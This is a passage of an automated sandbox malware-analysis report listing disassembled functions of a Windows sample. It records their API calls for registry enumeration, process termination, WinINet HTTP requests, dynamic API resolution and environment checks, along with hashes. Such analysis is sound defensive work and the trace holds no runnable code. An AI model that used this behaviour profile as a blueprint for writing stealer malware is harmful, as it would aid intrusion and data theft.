RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
wsprintfA.USER32 ref: 004185E9
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
RegCloseKey.ADVAPI32(00000000), ref: 0041861C
RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

RegQueryValueExA.ADVAPI32(00000000,00A70F58,00000000,000F003F,?,00000400), ref: 0041867C
lstrlenA.KERNEL32(?), ref: 00418691
RegQueryValueExA.ADVAPI32(00000000,00A71018,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
RegCloseKey.ADVAPI32(00000000), ref: 00418798
RegCloseKey.ADVAPI32(00000000), ref: 004187AA

Strings

%s\%s, xrefs: 004185DD

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 3131eed7b52e381784c663cb7396e085cc63190534808b605c4afb1523467a7a
Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
Opcode Fuzzy Hash: 3131eed7b52e381784c663cb7396e085cc63190534808b605c4afb1523467a7a
Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98

Function 004199A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
CloseHandle.KERNEL32(00000000), ref: 00419A79
CloseHandle.KERNEL32(0040A056), ref: 00419A88

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51

Function 023F4A67 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AA1
??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AB8
??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4ACF
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023F4AF0
InternetCrackUrlA.WININET(00000000,00000000), ref: 023F4B00

Strings

<, xrefs: 023F4A80

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
Instruction ID: 8d6b6befe8f4fabe0bddff8dbf383b7e0770b38956f7680b0e12521ff158f82b
Opcode Fuzzy Hash: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
Instruction Fuzzy Hash: 0F2115B1D00219ABDF14DFA5EC49ADD7B75FF44320F108229E925AB2D0EB706A09CF95

Function 02409C07 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02409C2C
Process32First.KERNEL32(023FA2BD,00000128), ref: 02409C40
Process32Next.KERNEL32(023FA2BD,00000128), ref: 02409C59
OpenProcess.KERNEL32(00000001,00000000,?), ref: 02409CB5
TerminateProcess.KERNEL32(00000000,00000000), ref: 02409CD3
CloseHandle.KERNEL32(00000000), ref: 02409CE0
CloseHandle.KERNEL32(023FA2BD), ref: 02409CEF

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction ID: 9b7a5e912553a78b8351e63e6a80ec204814524e411f88cf31b201015df7d757
Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction Fuzzy Hash: 72211A74D04218EBDB21DF51CC88BEEB7B5BB48704F0041D9E50AA6294D7749BC4CF91

Function 00417820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
HeapAlloc.KERNEL32(00000000), ref: 0041783B
RegOpenKeyExA.ADVAPI32(80000002,00A6A498,00000000,00020119,00000000), ref: 0041786D
RegQueryValueExA.ADVAPI32(00000000,00A70F10,00000000,00000000,?,000000FF), ref: 0041788E
RegCloseKey.ADVAPI32(00000000), ref: 00417898

Strings

Windows 11, xrefs: 0041784D

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55

Function 02407A87 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 02407A9B
RtlAllocateHeap.NTDLL(00000000), ref: 02407AA2
RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,00000000), ref: 02407AD4
RegQueryValueExA.ADVAPI32(00000000,006D6E34,00000000,00000000,?,000000FF), ref: 02407AF5
RegCloseKey.ADVAPI32(00000000), ref: 02407AFF

Strings

Windows 11, xrefs: 02407AB4

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction ID: 22a82164f2528eeacfcbbd8b31ee7107bb3114427920f5fd2d5128db573a1833
Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction Fuzzy Hash: D0016775E05305BBDB00DBE0DD89F6EB779EB44705F004156F605D7291E770AA40CB91

Function 004178B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
HeapAlloc.KERNEL32(00000000), ref: 004178CB
RegOpenKeyExA.ADVAPI32(80000002,00A6A498,00000000,00020119,00417849), ref: 004178EB
RegQueryValueExA.ADVAPI32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
RegCloseKey.ADVAPI32(00417849), ref: 00417914

Strings

CurrentBuildNumber, xrefs: 00417901

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91

Function 00419470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
CloseHandle.KERNEL32(000000FF), ref: 004194B7

Strings

>=A, xrefs: 004194A1, 004194CD, 004194A4
>=A, xrefs: 00419488, 0041948B

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: >=A$>=A
API String ID: 1378416451-3536956848
Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85

Function 023F7597 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 023F7601
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 023F7678
StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 023F76D4
GetProcessHeap.KERNEL32(00000000,?), ref: 023F7719
HeapFree.KERNEL32(00000000), ref: 023F7720

Part of subcall function 023F94F7: vsprintf_s.MSVCRT ref: 023F9512

task.LIBCPMTD ref: 023F781C

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
String ID:
API String ID: 700816787-0
Opcode ID: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
Instruction ID: da5d687ad1b61c1d063d904b07c4f0132a42ca9aa788a8f5b4907be84dbd27ab
Opcode Fuzzy Hash: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
Instruction Fuzzy Hash: B9612CB591026C9BDB64DB50DC85FE9B7B9BF48300F0081EAE649A6150DB70ABC9CF91

Function 02405777 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D

Part of subcall function 023F6537: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 023F6598
Part of subcall function 023F6537: StrCmpCA.SHLWAPI(?,006D6E80), ref: 023F65BA
Part of subcall function 023F6537: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023F65EC
Part of subcall function 023F6537: HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 023F663C
Part of subcall function 023F6537: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 023F6676
Part of subcall function 023F6537: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 023F6688

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 024057CF
lstrlen.KERNEL32(00000000), ref: 024057E6

Part of subcall function 02409227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02409249

StrStrA.SHLWAPI(00000000,00000000), ref: 0240581B
lstrlen.KERNEL32(00000000), ref: 0240583A
strtok.MSVCRT(00000000,?), ref: 02405855
lstrlen.KERNEL32(00000000), ref: 02405865

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID:
API String ID: 3532888709-0
Opcode ID: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
Instruction ID: 6aa39783c1f1951564876f01affaf5e9cab7463a0dbd2ee5a1090cf444ded091
Opcode Fuzzy Hash: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
Instruction Fuzzy Hash: B951E670900218ABCB18EF61DDD5EED7736AF10301F90447EEA0A665E0EF346A89CF51

Function 024075B7 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 024075C5

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

OpenProcess.KERNEL32(001FFFFF,00000000,024077F4,004205C5), ref: 02407603
memset.MSVCRT ref: 02407651
??_V@YAXPAX@Z.MSVCRT(?), ref: 024077A5

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID:
API String ID: 224852652-0
Opcode ID: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
Instruction ID: 5704d8aca9b6d19d9c37e41fd60191ab3a144d47812461957cd663c3514ea92b
Opcode Fuzzy Hash: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
Instruction Fuzzy Hash: 9F515BB0D002189BDB24EBA5DC84BEEB7B5AF04304F1085AED215672C1EB747AC8CF59

Function 00414300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414325
RegOpenKeyExA.ADVAPI32(80000001,00A716D0,00000000,00020119,?), ref: 00414344
RegQueryValueExA.ADVAPI32(?,00A721D0,00000000,00000000,00000000,000000FF), ref: 00414368
RegCloseKey.ADVAPI32(?), ref: 00414372
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
lstrcatA.KERNEL32(?,00A720E0), ref: 004143AB

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: b7a2b2d126f7ab3408effdadbb97cbe1cf7c5d5d93e5af13826bf428bfc09082
Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
Opcode Fuzzy Hash: b7a2b2d126f7ab3408effdadbb97cbe1cf7c5d5d93e5af13826bf428bfc09082
Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1

Function 02404567 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0240458C
RegOpenKeyExA.ADVAPI32(80000001,006D6ED8,00000000,00020119,?), ref: 024045AB
RegQueryValueExA.ADVAPI32(?,006D6AD4,00000000,00000000,00000000,000000FF), ref: 024045CF
RegCloseKey.ADVAPI32(?), ref: 024045D9
lstrcat.KERNEL32(?,00000000), ref: 024045FE
lstrcat.KERNEL32(?,006D6B68), ref: 02404612

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
Instruction ID: 2e98f864dc180dff19901595af922e623191513eb3b5d222be59e20dc0a7afe0
Opcode Fuzzy Hash: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
Instruction Fuzzy Hash: D4414B76D00108ABDB14FBA0ED95FEE733AAB48300F04455EB769561C0EA75578C8FE1

Function 004137B0 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004137D8

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

strtok_s.MSVCRT ref: 00413921

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,00A6DD90,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 2c66abec2bd4a2ca17be66da4dca2020188b6c17f291cc5ff4630984ccd5f22a
Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
Opcode Fuzzy Hash: 2c66abec2bd4a2ca17be66da4dca2020188b6c17f291cc5ff4630984ccd5f22a
Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA

Function 023F9CB7 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 023F9CD1
InternetOpenUrlA.WININET(00000000,00421250,00000000,00000000,80000000,00000000), ref: 023F9D12
InternetCloseHandle.WININET(00000000), ref: 023F9D2E

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID:
API String ID: 3289985339-0
Opcode ID: 17ff0f5a9049df77a866354e3abf0ac28466d12122aa9a0dab184debf790f5b3
Instruction ID: 2fa1fff9f830fc38c51ad30024985d106d9ffe4bf70d06857a1f72e9cb475237
Opcode Fuzzy Hash: 17ff0f5a9049df77a866354e3abf0ac28466d12122aa9a0dab184debf790f5b3
Instruction Fuzzy Hash: 21417C31A10258EBCB14EF94DC84FDDB7B9AB48740F5050AAF645BB190DBB4AE80CF64

Function 0041B68C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041B69A

Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B2E6

DecodePointer.KERNEL32(0042A260,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B6E7

Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138

DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B70D
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B720
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B72A

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
Instruction ID: f2b3184d1a1304bb90a50cba908fab2f5b5379eafeb7e6c0534b29cc51b1fef6
Opcode Fuzzy Hash: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
Instruction Fuzzy Hash: 1331F974900349DFDF11AFA5D9856DDBAF1FF88314F14402BE460A62A0DB784985CF99

Function 02406EF7 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 02409E58
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 02409E71
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 02409E89
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 02409EA1
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 02409EBA
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 02409ED2
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 02409EEA
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 02409F03
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 02409F1B
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 02409F33
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 02409F4C
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 02409F64
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 02409F7C
Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 02409F95

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 023F1437: ExitProcess.KERNEL32 ref: 023F1478

Part of subcall function 023F13C7: GetSystemInfo.KERNEL32(?), ref: 023F13D1
Part of subcall function 023F13C7: ExitProcess.KERNEL32 ref: 023F13E5

Part of subcall function 023F1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 023F1392
